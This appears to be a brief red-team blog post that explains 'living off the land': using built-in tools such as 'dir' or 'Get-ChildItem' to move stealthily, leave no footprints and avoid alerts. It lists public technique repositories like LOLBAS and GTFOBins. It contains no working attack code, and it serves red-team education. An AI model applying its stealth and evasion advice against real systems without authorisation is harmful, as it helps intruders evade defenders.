Can your red team live off the land?
Learn what are living off the land techniques and why they are important during a red team engagement.
Imagine you are left in a jungle for a week. You carry a few basic tools such as torch, rope, knife and a match box but nothing else. Will you be able to survive in the jungle for a week with just these tools? You can; As long as you are willing to live off the land (i.e. the jungle) and survive on whatever the jungle has to offer (maybe a cave for shelter, snakes for food, a pond of stagnant water etc.). To be able to do this, you’ll need to know how to hunt, how to fight that bear in the cave, how to make your own fire and a host of other skills.
Similarly, as a red team operator it is important to know how to advance in the red team operations attack lifecycle, during a red team engagement, just by using tools available within the environment. In the red team context, this is known as living off the land. In other words, living off the land means blending into the digital environment by using what's already there to achieve your goals stealthily. For example, instead of uploading a tool to list files on a system, a red team operator might use the built-in dir or Get-ChildItems
command on Windows. This action looks like a legitimate user working on the system.
Red Team Notes
- List of repositories offering information about living off the land tools and techniques:
- Windows - LOLBAS
- Unix / Linux - GTFOBins
- MacOS - LOOBins
- Drivers - LOLDrivers
- Active Directory - LOLAD
- Application-based techniques - LOLAPPS
- Living off the Living Off the Land Project
Follow my journey of 100 Days of Red Team on WhatsApp or Discord.
This has multiple advantages:
You don’t need to bring in external tools, thus leaving no visible footprints behind.
Your activities are camouflaged as normal activities of the environment.
You are using tools that are signed and trusted so there’s a high likelihood that the system will trust whatever you do without sending out alerts.
The 2022 Ukraine Electric Power Attack and the Cutting Edge campaign are real-world examples where attackers leveraged living off the land techniques for exploitation.